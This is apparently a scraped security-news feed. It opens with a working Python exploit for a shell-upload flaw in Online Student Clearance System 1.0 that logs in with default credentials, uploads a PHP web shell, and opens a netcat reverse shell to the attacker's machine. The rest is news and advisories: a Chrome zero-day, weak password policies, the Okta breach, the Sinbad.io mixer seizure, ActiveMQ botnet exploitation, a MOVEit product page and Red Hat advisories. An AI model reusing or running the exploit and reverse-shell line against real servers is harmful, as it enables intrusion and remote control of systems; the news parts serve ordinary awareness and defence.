Online Student Clearance System versions 1.0 and below suffer from a remote shell upload vulnerability.

#!/usr/bin/python3

# Exploit Title: Online Student Clearance System - Unrestricted File Upload to RCE (Authenticated)  
# Date: 28/11/2023  
# Exploit Author: Akash Pandey aka l3v1ath0n  
# Version: <= 1.0  
# Tested on: Kali Linux  
# CVE : CVE-2022-3436

import requests  
import time  
import os

print("""

                     ____   ___ ____  ____      _____ _  _  _____  __     
  _____   _____     |___ \ / _ \___ \|___ \    |___ /| || ||___ / / /_    
 / __\ \ / / _ \_____ __) | | | |__) | __) |____ |_ \| || |_ |_ \| '_ \   
| (__ \ V /  __/_____/ __/| |_| / __/ / __/_____|__) |__   _|__) | (_) |  
 \___| \_/ \___|    |_____|\___/_____|_____|   |____/   |_||____/ \___/ 

                                                                                                                                              Exploit: By Akash Pandey aka l3v1ath0n, developed with ❤️:  
Twitter: https://twitter.com/_l3v1ath0n  
Github: https://www.github.com/1337-L3V1ATH0N/Exploit_Development/  
""")

web_url = "http://192.168.1.26/student/" # Edit this as per your need  
username = "18/132010" # Default Username  
password = "11111111" # Default Password  
local_ip = "192.168.1.6" # Edit this IP to your local Ip for reverse shell  
local_port = "1337" # Port of local machine to connect reverse shell on...  
rev_shell = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc " + local_ip + " " + local_port + " >/tmp/f"

# Firing request to login  
log_url = web_url+"login.php"

#Telling script to use previous session  
session = requests.Session()

#Post Body Data for login  
post_data = {'txtmatric_no':username,'txtpassword':password, 'btnlogin':''}

#Sending request to web server with required post data  
response = session.post(log_url,data=post_data)

# Checking Login if Successful:  
time.sleep(1)

# Creating a shell file in current directory  
print("[i] Creating a shell file to upload.")

with open("shell.php","w") as file:  
    file.write("<?php echo shell_exec($_GET['cmd'].' 2>&1'); ?>")  
    file.close()  
time.sleep(1)

print("[i] Checking Login.")

if response.history:  
    print("[+] Login Successful.")

    time.sleep(1)

    print("[i] Uploading Shell.")

    # Step 1: Reads the shell.php file in current folder  
    # Step 2: Stores the content in filename called shell.php  
    # Step 3: Uses the variable name userImage to upload file to server.  
    file = {'userImage':('shell.php',open("shell.php","rb"))}

        # Sending payload as POST data to shell.php file  
    payload = {'userImage':"<?php echo shell_exec($_GET['cmd'].' 2>&1'); ?>",'btnedit':''}

    # Uploading the malicious php file at below path using files and data values   
    upload_response = session.post(web_url+"edit-photo.php",files=file,data=payload)  
    print ("[TIP] Run netcat to catch reverse-shell on nc. Edit IP and Port in script")  
    while True:  
        command = input("l3v1ath0n㉿CVE-2022-3436: ")  
        if command == "exit":  
            break  
        elif command == "netcat":  
            print("[!] Don't forget to start Netcat Listener")  
            time.sleep(3)  
            payload = {'cmd':rev_shell}  
            cmd = session.get(web_url+"uploads/shell.php?",params=payload)  
            print(cmd.text)  
        else:  
            payload = {'cmd':command}  
            cmd = session.get(web_url+"uploads/shell.php?",params=payload)  
            print(cmd.text)

    print("\n[i] Closing this Session")  
    session.close()

else:  
    print("[-] Login Failed.")

Online Student Clearance System 1.0 Shell Upload

Google's released an update to Chrome which includes seven security fixes. Make sure you're using the latest version!

Google has released an update to Chrome which includes seven security fixes including one for a vulnerability which is known to have already been exploited.

If you’re a Chrome user on Windows, Mac, or Linux, you should update as soon as possible.

The easiest way to update Chrome is to set it to update automatically, but you have to make sure to close your browser for the update to finish. You can also end up on an older, vulnerable version if something goes wrong—such as an extension stopping you from updating the browser.

So, it doesn’t hurt to check now and then. And now would be a good time, given the severity of the vulnerabilities in this batch. My preferred method is to have Chrome open the page _chrome://settings/help_ which you can also find by clicking **Settings > About Chrome** (on Windows) or **Google Chrome > About Google Chrome** (on Mac).

If there is an update available, Chrome will start downloading it. Then all you have to do is relaunch the browser in order for the update to complete.

_Google Chrome is up to date_

After the update, the version should be listed as 119.0.6045.199 for Mac and Linux, and 119.0.6045.199/.200 for Windows, or later.

**The technical details**

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The CVE assigned to the actively expoited zero-day is:

CVE-2023-6345: Integer overflow in Skia. Google notes it is aware that an exploit for CVE-2023-6345 exists in the wild. This vulnerability could lead to a range of risks, from crashes to the execution of arbitrary code.

Google never gives out a lot of information about vulnerabilities, for obvious reasons. Access to bug details and links may be kept restricted until a majority of users are updated with a fix, so that interested criminals remain none the wiser.

The fact that the vulnerability is listed with a severity rating of High, indicates that the scope of the flaw is limited to the browser, but this could mean successful exploitation could provide the attacker with information about visited websites and so on.

Skia is an open source 2D graphic library for drawing Text, Geometries, and Images. Skia works across a variety of hardware and software platforms. It serves as the graphics engine for Google Chrome and ChromeOS, Android, Flutter, and many other products.

That’s why users of other Chromium based browsers and software that uses Skia should keep their eyes open for similar updates.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

 Update now! Chrome fixes actively exploited zero-day vulnerability 

A new study that looked at the password requirements of the most popular websites came to a disappointing but not surprising conclusion.

A new study that examines the current state of password policies across the internet shows that many of the most popular websites allow users to create weak passwords.

For the Georgia Tech study, the researchers designed an algorithm that automatically determined a website’s password policy. With the help of machine learning, they could see the consistency of length requirements and restrictions for numbers, upper- and lower-case letters, special symbols, combinations, and starting letters. They could also see if sites permitted dictionary words or known breached passwords.

Using this tool they found:

*   12% of the websites they looked at completely lack password length requirements
*   3 out of 4 fail to meet minimum requirement standards which means they:
    
    *   Allow very short passwords
    
    *   Do not block common passwords
    
    *   Use outdated requirements like complex characters

More than half of the websites in the study accepted passwords with six characters or less, with 75% failing to require the recommended eight-character minimum. Around 12% of the websites had no length requirements, and 30% did not support spaces or special characters.

Giving users that kind of freedom is asking for them to be duped. As we pointed out a while back, even tech-savvy users like IT administrators resort to awful passwords when given the chance.

The reasons for not enforcing standards are obvious. Most websites care more about customer satisfaction than security, and you can guess which one is better for business.

Users don’t like passwords, especially since the password situation has been made worse by ridiculous and unnecessary rules, such as asking users to pick passwords that follow formulas, or forcing users to change their password every few months. Both rules have been discredited but continue to haunt us. Formulas reduce the number of possible passwords a user can pick from, and regular password resets encourage users to pick passwords that conform to a predictable pattern, both of which can make guessing passwords easier, which is the opposite of what we want.

If you’d like to read more about this, read “Why (almost) everything we told you about passwords was wrong.” The article summarizes how a lot of what you’ve been told about passwords over the years was either wrong (change your passwords as often as your underwear), misguided (choose long, complicated passwords), or counterproductive (don’t reuse passwords).

We feel that we should entirely move away from the model that requires users to create and remember passwords. It is time for something more secure AND user-friendly. And it’s not like these systems don’t exist (hello Passkeys), we just need to embrace them more widely.

Let’s enable muti-factor authentication (MFA) where we can, even if we feel that using a password as the first factor doesn’t add a lot of extra security to the login procedure. And if we need to rely on passwords alone, try using a password manager. They help you create complex passwords and remember them for you.

The full report of the researchers will be presented at the ACM Conference on Computer and Communications Security (CCS) in Copenhagen, Denmark, later this month.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

 Many major websites allow users to have weak passwords 

When KrebsOnSecurity broke the news on Oct. 20, 2023 that identity and authentication giant Okta had suffered a breach in its customer support department, Okta said the intrusion allowed hackers to steal sensitive data from fewer than one percent of its 18,000+ customers. But today, Okta revised that impact statement, saying the attackers also stole the name and email address for nearly all of its customer support users.

When KrebsOnSecurity broke the news on Oct. 20, 2023 that identity and authentication giant **Okta** had suffered a breach in its customer support department, Okta said the intrusion allowed hackers to steal sensitive data from fewer than one percent of its 18,000+ customers. But today, Okta revised that impact statement, saying the attackers also stole the name and email address for nearly all of its customer support users.

Okta acknowledged last month that for several weeks beginning in late September 2023, intruders had access to its customer support case management system. That access allowed the hackers to steal authentication tokens from some Okta customers, which the attackers could then use to make changes to customer accounts, such as adding or modifying authorized users.

In its initial incident reports about the breach, Okta said the hackers gained unauthorized access to files inside Okta’s customer support system associated with 134 Okta customers, or less than 1% of Okta’s customer base.

But in an updated statement published early this morning, Okta said it determined the intruders also stole the names and email addresses of all Okta customer support system users.

“All Okta Workforce Identity Cloud (WIC) and Customer Identity Solution (CIS) customers are impacted except customers in our FedRamp High and DoD IL4 environments (these environments use a separate support system NOT accessed by the threat actor),” Okta’s advisory states. “The Auth0/CIC support case management system was also not impacted by this incident.”

Okta said that for nearly 97 percent of users, the only contact information exposed was full name and email address. That means about three percent of Okta customer support accounts had one or more of the following data fields exposed (in addition to email address and name): last login; username; phone number; SAML federation ID; company name; job role; user type; date of last password change or reset.

Okta notes that a large number of the exposed accounts belong to Okta administrators — IT people responsible for integrating Okta’s authentication technology inside customer environments — and that these individuals should be on guard for targeted phishing attacks.

“Many users of the customer support system are Okta administrators,” Okta pointed out. “It is critical that these users have multi-factor authentication (MFA) enrolled to protect not only the customer support system, but also to secure access to their Okta admin console(s).”

While it may seem completely bonkers that some companies allow their IT staff to operate company-wide authentication systems using an Okta administrator account that isn’t protected with MFA, Okta said _fully six percent of its customers (more than 1,000) persist in this dangerous practice._

In a previous disclosure on Nov. 3, Okta blamed the intrusion on an employee who saved the credentials for a service account in Okta’s customer support infrastructure to their personal Google account, and said it was likely those credentials were stolen when the employee’s personal device using the same Google account was compromised.

Unlike standard user accounts, which are accessed by humans, service accounts are mostly reserved for automating machine-to-machine functions, such as performing data backups or antivirus scans every night at a particular time. For this reason, they can’t be locked down with multifactor authentication the way user accounts can.

Dan Goodin over at Ars Technica reckons this explains why MFA wasn’t set up on the compromised Okta service account. But as he rightly points out, if a transgression by a single employee breaches your network, you’re doing it wrong.

“Okta should have put access controls in place besides a simple password to limit who or what could log in to the service account,” Goodin wrote on Nov. 4. “One way of doing this is to put a limit or conditions on the IP addresses that can connect. Another is to regularly rotate access tokens used to authenticate to service accounts. And, of course, it should have been impossible for employees to be logged in to personal accounts on a work machine. These and other precautions are the responsibility of senior people inside Okta.”

Goodin suggested that people who want to delve further into various approaches for securing service accounts should read this thread on Mastodon.

“A fair number of the contributions come from security professionals with extensive experience working in sensitive cloud environments,” Goodin wrote.

Okta: Breach Affected All Customer Support Users

By Waqas
US Treasury Sanctions Sinbad.io for Laundering Millions in Stolen Funds Linked to North Korea's Lazarus Group.
This is a post from HackRead.com Read the original post: US Seizes Bitcoin Mixer Sinbad.io Used by Lazarus Group

According to the US government, Sinbad.io provided its services to the Lazarus group to launder money stolen from numerous data breaches, including those affecting Horizon Bridge, Axie Infinity, and Atomic Wallet.

The official domain of Sinbad.io, a popular Bitcoin “mixer” service has been seized by the United States government. The reason to seize the service given by the US Treasury is that the service apparently, was involved in laundering millions of dollars stolen by North Korean state-based notorious Lazarus group.

Those visiting Sinbad.io can now encounter a homepage uploaded by the government of the United States, announcing the following:

> _This service has been seized as part of a coordinated law-enforcement action between the Federal Bureau of Investigation, the Financial Intelligence and Investigation Service (FIOD), and the National Bureau of Investigation taken against the Sinbad.io cryptocurrency mixing service. The Federal Bureau of Investigation has seized the service in accordance with a seizure warrant pursuant to 18 U.S.C. 55 981 and 982 as part of a coordinated international law-enforcement operation._

In a press release dated November 29, 2023, the Treasury accused Sinbad.io of processing hundreds of millions of dollars worth of cryptocurrency obtained from various sources. These sources reportedly include large-scale data breaches, notably the $100 million hack affecting Horizon Bridge in June 2022, the $620 million from the Axie Infinity hack in March 2022, and the impact on customers of Atomic Wallet in June 2023.

What Sinbad.io’s homepage shows to visitors (Image credit: Hackread.com)

The US government further claimed that Sinbad.io is not only used for financial crimes but is also a tool employed by cybercriminals for “obfuscating transactions” associated with activities such as sanctions evasion, drug trafficking, purchasing child sexual abuse materials, and other illicit sales on dark web marketplaces.

The Lazarus group, operating under the control of the Democratic People’s Republic of Korea (DPRK), is infamous for its hacking activities. The US alleges that Sinbad.io serves as a “key money-laundering tool” for the already-sanctioned Lazarus group, which is believed to have stolen a staggering $2 billion worth of digital assets over its operational history.

According to the Q3 2023 Crypto Losses Report by Immunefi, a blockchain cybersecurity firm, the cryptocurrency industry incurred a loss of $685.5 million, marking the highest quarterly loss for the year.

The two largest exploits of the quarter were on Mixin Network and Multichain, which together accounted for 47.5% of all losses. The Lazarus Group, a North Korean state-sponsored hacking group, was responsible for $208.6 million in stolen funds, representing 30% of the total losses.

As for Sinbad.io, it operates on the Bitcoin blockchain and is considered by experts to be a successor to the previously sanctioned crypto mixer, Blender.io. The Office of Foreign Assets Control (OFAC) sanctioned Blender.io on May 6, 2022.

However, ddespite authorities shutting down the original Sinbad.io address, a mirrored site surfaced, registered in Moscow on November 18. A Google search for the original Sinbad.io now shows a copycat site, 1sinbadgo.com, as the second result. Notably, the copycat site, which also boasts a .Onion domain, claims to provide identical services to the original seized domain.

(Image credit: Hackread.com)

Nevertheless, the sanctions imposed by the US require the blocking and reporting of “all property and interests in property” belonging to Sinbad.io that are within the United States or under the possession or control of US persons, according to the press release.

****_RELATED ARTICLES_****

1.  **Lazarus Group uses KandyKorn macOS malware for crypto theft**
2.  **Lazarus APT Exploiting LinkedIn to Target Spanish Aerospace Firm**
3.  **Lazarus-Linked BlueNoroff APT Hits macOS with ObjCShellz Malware**
4.  **N. Korean Lazarus Group Suspected in $37.3M CoinsPaid Crypto Heist**
5.  **Hackers Used Fake LinkedIn Job Offer to Hack Off $625M from Axie Infinity**

US Seizes Bitcoin Mixer Sinbad.io Used by Lazarus Group

By Deeba Ahmed
The ActiveMQ flaw has been patched, but despite this, numerous threat actors continue to exploit it.
This is a post from HackRead.com Read the original post: Cybercriminals Exploit ActiveMQ Flaw to Spread GoTitan Botnet, PrCtrl Rat

The recently discovered GoTitan botnet is built on the Golang programming language, whereas PrCtrl Rat is a .NET program.

Fortinet’s FortiGuard Labs published new research highlighting that a critical Apache ActiveMQ vulnerability tracked as **CVE-2023-46604** is under active exploitation by numerous threat actors.

Despite the release of a patch a month ago, FortiGuard researchers continue to identify various malware strains exploiting a known flaw. The persistent exploitation by cybercriminals is concerning, as it allows them to execute arbitrary code on susceptible servers.

FortiGuard Labs’ report has brought attention to several new threats, such as the emergence of a Golang-based botnet named GoTitan and a .NET program called PrCtrl Rat, which possesses remote control capabilities.

Apache recently issued an advisory regarding a vulnerability related to the deserialization of untrusted Apache data. The Cybersecurity and Infrastructure Security Agency (CISA) has categorized this flaw in its Known Exploited Vulnerabilities **(KEV) catalogue**, underscoring its high risk and potential impact.

Researchers claim that this flaw is currently being exploited to distribute various malware strains, including GoTitan, PrCtrl Rat, Kinsing, Silver, and Ddostff.

Silver, designed as an advanced penetration testing tool and red teaming framework, has the capability to support various callback protocols, including TCP, DNS, and HTTP(S). **Kinsing malware** specializes in supporting cryptojacking operations and can exploit newly discovered security vulnerabilities. On the other hand, **Ddostff botnet** has been widely employed in Distributed Denial of Service (DDoS) attacks since 2016.

GoTitan, a recently uncovered botnet, is coded in the **Go programming language**. Users typically download this botnet from a malicious URL, and it is currently compatible with x64 architectures. Upon installation, the botnet initiates a system scan and generates a debug file named c.log to document execution time and status.

Following its initial installation, GoTitan replicates itself as .mod within the system, establishing a recurring execution by registering in the Cron. To facilitate communication, the botnet retrieves the Command and Control (C2) IP address. It utilizes this connection to transmit stolen data, encompassing details about the infected device, such as memory, CPU specifications, and architecture information.

According to Fortinet Labs’ **blog post,** for data transmission, it uses “<==>” as separators. The message starts with “Titan<==>” whereas it communicates with the C2 by sending “FE FE” as a heartbeat signal and waits for further instructions. GoTitan supports ten different methods of launching DDoS attacks.

The exploitation process begins with the attacker establishing a connection to the ActiveMQ server using the OpenWire protocol, commonly on port 61616. Subsequently, the attacker sends a carefully crafted packet, inducing the system to unmarshal a class under their control.

This action prompts the vulnerable server to fetch and load a class configuration XML file from a designated remote URL. Within this malicious XML file, arbitrary code is defined, aiming to execute on the compromised machine.

GoTiten and PrCtrl Rat’s XML file (Credit: FortiGuard Labs

Technical details and proof-of-concept (PoC) code for the vulnerability are publicly accessible. Users are advised to stay vigilant against active exploits by Sliver, Kinsing, and Ddostf. Prioritizing system updates and patching is crucial, and regular monitoring of security advisories is recommended to effectively mitigate the risk of exploitation.

****_RELATED ARTICLES_****

1.  **Fake Super Mario 3 Installers Drop Crypto Miner, Data Stealer**
2.  **Microsoft Azure Exploited to Create Undetectable Cryptominer**
3.  **Hackers actively exploiting 0-day in Ubiquitous Apache Log4j tool**
4.  **Golang malware infecting Windows, Linux servers with XMRig miner**
5.  **Nitrokod Crypto Miner Hiding in Fake Microsoft, Google Translate Apps**

Cybercriminals Exploit ActiveMQ Flaw to Spread GoTitan Botnet, PrCtrl Rat


In Progress MOVEit Transfer versions released before 2022.0.9 (14.0.9), 2022.1.10 (14.1.10), 2023.0.7 (15.0.7), a privilege escalation path associated with group administrators has been identified.  It is possible for a group administrator to elevate a group members permissions to the role of an organization administrator.


MOVEit enables your organization to meet strict cybersecurity compliance standards such as PCI-DSS, HIPAA, GDPR, SOC2 and more. Provide a secure environment for your most sensitive files, while easily ensuring the reliability of core business processes.

30-day FREE trial. No credit card required.

Release

**MOVEit 2023.1: Check Out All the New Features in the Latest Release**

**MOVEit Modules**

MOVEit’s flexible architecture makes it easy to choose the exact capabilities that match your organization’s specific needs.

**MOVEit Transfer**

*   **On-premise** solution.
*   Ensure management and control over your business-critical file transfers by consolidating them all on one system.
*   Leverage MOVEit Transfer’s file encryption, security, activity tracking tamper-evident logging, and centralized access controls.
*   Reliably and easily comply with SLAs, internal governance requirements and regulations like PCI, HIPAA, CCPA/CPRA and GDPR.

Explore MOVEit Transfer Free Trial

**MOVEit Cloud**

*   MOVEit Transfer hosted by Progress **as-a-Service in the Cloud**.
*   All the benefits of managed file transfer without the heavy lifting.
*   Operational reliability with clear SLAs and internal governance.
*   Compliant with PCI, HIPAA, CCPA/CPRA and GDPR.

Explore MOVEit Cloud Free Trial

**MOVEit Automation**

*   Works with MOVEit Cloud, MOVEit Transfer, hybrid cloud endpoints (AWS S3, Azure Blob, SharePoint, etc.) or any FTP system.
*   **Provides advanced workflow automation capabilities without the need for scripting.**
*   Securely share sensitive files with full visibility into all file transfer activities, including a tamper-evident audit trail.

Explore MOVEit Automation Free Trial

**Additional Features**

Email and Web Transfer

MOVEit Ad-Hoc makes secure file transfer easily accessible from Microsoft Outlook or a web browser to assure the compliant ad-hoc transfers of sensitive data.

Secure End-User Collaboration

Secure Folder Sharing provides internal and external end users with an easy-to-use, drag-and-drop collaboration capability as an alternative to using email or content collaboration to share sensitive data.

Mobile Managed File Transfer

The free MOVEit Mobile app puts secure and managed file transfer control at your fingertips via your iOS or Android device.

Flexible Deployment

Deployment flexibility means you can meet your exact needs with options ranging from MFT-as-a-Service, to public cloud to on-premises or hybrid cloud solutions.

MOVEit Add-in for Microsoft Outlook

Provides an exceptional user experience that makes sharing secure files intuitive and hassle-free. Deploys centrally with nothing for users to install or maintain.

DMZ Proxy Gateway

MOVEit Gateway is a DMZ proxy server that keeps confidential/sensitive data, authentication, and access information behind the firewall.

**Industries**

**Banking & Finance**

Secure file sharing is the foundation for trust in financial transactions. Use MOVEit to help meet PCI-DSS, GDPR, and ISO 27001 compliance requirements.

Explore

**Government & Public Sector**

MOVEit helps IT teams at almost every federal civilian agency and military branch to securely transfer mission-critical information and assure the performance of their networked infrastructures and applications.

Explore

**Healthcare**

When lives are on the line, IT teams need to deliver virtually zero downtime and assure the secure and confidential movement of patient data.

Explore

**Insurance**

Pushing claims or processing payments, IT teams in a highly regulated industry like insurance need powerful tools that make their lives simpler.

Explore

**Manufacturing**

Gain operational efficiencies and eliminate manual errors while securely delivering important files to customers and partners.

Explore

**Education**

Ensure your school protects and shares personally identifiable information through encryption that protects sensitive files at rest and in transit.

Explore

**Request Pricing**

Get a free price quote from one of our experts.

**Additional Capabilities**

**Multi-Tenancy**

Our Multi-tenancy option enables MOVEit Transfer to simultaneously serve multiple client organizations, or “tenants”, on a domain or username basis.

Download Data Sheet

**High Availability**

MOVEit Transfer has a flexible architecture that can be deployed on one or more systems to address availability, performance or scalability requirements.

Download Data Sheet

**Desktop Clients**

Choose from a full range of desktop clients to meet your needs, including an easy-to-use MOVEit Client for Windows and MacOS, WS\_FTP, MOVEit EZ and MOVEit Freely

See Desktop Clients

**API**

The MOVEit API offers third-party programs access to a wide variety of MOVEit Cloud and MOVEit Transfer services and administrative capabilities.

Download Data Sheet

**MOVEit Architecture**

Any FTPS ServerAny SFTP ServerAny HTTPS ServerAny ASx Server Mainframe/Unix Server Network Share Any FTPS ServerAny SFTP Server Azure Blob AWS S3 Firewall Firewall Sharepoint Email ServerSMIME Email Server Email Server Internet DMZ Secure Network Web Browser Web Browser Microsoft Outlook Mobile Users Mobile Users Any FTPS ClientAny SFTP ClientAS2 or AS3 ClientOther MOVEit Clients Any FTPS ClientAny SFTP ClientOther MOVEit Clients FTPS, SFTP, HTTPS, ASx FTPS, SFTP, SMB FTPS, SFTP, HTTPS Secure Tunel HTTPS FTPS, SFTP, HTTPS, ASx Any FTPS ServerAny SFTP ServerAny HTTPS ServerAny ASx Server Sharepoint Email ServerSMIME Email Server Azure Blob AWS S3 Internet FTPS, SFTP, HTTPS, ASx DMZ Firewall Firewall Web Browser Mobile Users Any FTPS ClientAny SFTP ClientAS2 or AS3 ClientOther MOVEit Clients HTTPS Mainframe/Unix Server Network Share Any FTPS ServerAny SFTP Server Email Server SECURETUNEL Web Browser MicrosoftOutlook Mobile Users Any FTPS ClientAny SFTP ClientOther MOVEit Clients FTPS, SFTP, HTTPS FTPS, SFTP, SMB Secure Network

**Awards**

**MOVEit Earns Gold Medal in Latest Info-Tech Report**

MOVEit named industry leader in latest Info-Tech report on MFT vendors, placing first in quality and breadth of features.

Read the Report

**Related Resources**

**MOVEit Managed File Transfer FAQs**

**Start Your Free MOVEit Trial**

CVE-2023-6218: MOVEit Secure Managed File Transfer Software | Progress

Red Hat Security Advisory 2023-7533-01 - An update for tigervnc is now available for Red Hat Enterprise Linux 8.8 Extended Update Support. Issues addressed include an out of bounds write vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7533.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: tigervnc security updateAdvisory ID:        RHSA-2023:7533-01Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7533Issue date:         2023-11-28Revision:           01CVE Names:          CVE-2023-5367====================================================================Summary: An update for tigervnc is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Virtual Network Computing (VNC) is a remote display system which allows users to view a computing desktop environment not only on the machine where it is running, but from anywhere on the Internet and from a wide variety of machine architectures. TigerVNC is a suite of VNC servers and clients.Security Fix(es):* xorg-x11-server: Out-of-bounds write in XIChangeDeviceProperty/RRChangeOutputProperty (CVE-2023-5367)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-5367References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2243091

Red Hat Security Advisory 2023-7533-01

Red Hat Security Advisory 2023-7526-01 - An update for tigervnc is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions. Issues addressed include an out of bounds write vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7526.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: tigervnc security updateAdvisory ID:        RHSA-2023:7526-01Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7526Issue date:         2023-11-28Revision:           01CVE Names:          CVE-2023-5367====================================================================Summary: An update for tigervnc is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Virtual Network Computing (VNC) is a remote display system which allows users to view a computing desktop environment not only on the machine where it is running, but from anywhere on the Internet and from a wide variety of machine architectures. TigerVNC is a suite of VNC servers and clients.Security Fix(es):* xorg-x11-server: Out-of-bounds write in XIChangeDeviceProperty/RRChangeOutputProperty (CVE-2023-5367)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-5367References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2243091

Red Hat Security Advisory 2023-7526-01

Red Hat Security Advisory 2023-7522-01 - Red Hat OpenShift Virtualization release 4.13.6 is now available with updates to packages and images that fix several bugs and add enhancements. Issues addressed include a denial of service vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7522.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: OpenShift Virtualization 4.13.6 security and bug fix update  
Advisory ID:        RHSA-2023:7522-01  
Product:            OpenShift Virtualization  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:7522  
Issue date:         2023-11-28  
Revision:           01  
CVE Names:          CVE-2023-39325  
====================================================================

Summary: 

Red Hat OpenShift Virtualization release 4.13.6 is now available with updates to packages and images that fix several bugs and add enhancements.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

OpenShift Virtualization is Red Hat's virtualization solution designed for Red Hat OpenShift Container Platform.

This advisory contains OpenShift Virtualization 4.13.6 images.

Security Fix(es):

* golang: net/http, x/net/http2: rapid stream resets can cause excessive work (CVE-2023-44487) (CVE-2023-39325)

* HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (Rapid Reset Attack) (CVE-2023-44487)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Bug Fix(es):

* Virtual machine export is not working on Quota defined namespace (BZ#2236422)

* [4.13] Host assisted clone hangs because some provisioners don't allow mounting block PVC read only (BZ#2247666)

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-39325

References:

https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/security/vulnerabilities/RHSB-2023-003  
https://bugzilla.redhat.com/show_bug.cgi?id=2236422  
https://bugzilla.redhat.com/show_bug.cgi?id=2242803  
https://bugzilla.redhat.com/show_bug.cgi?id=2243296  
https://bugzilla.redhat.com/show_bug.cgi?id=2247666  
https://issues.redhat.com/browse/CNV-34788

Tag

#mac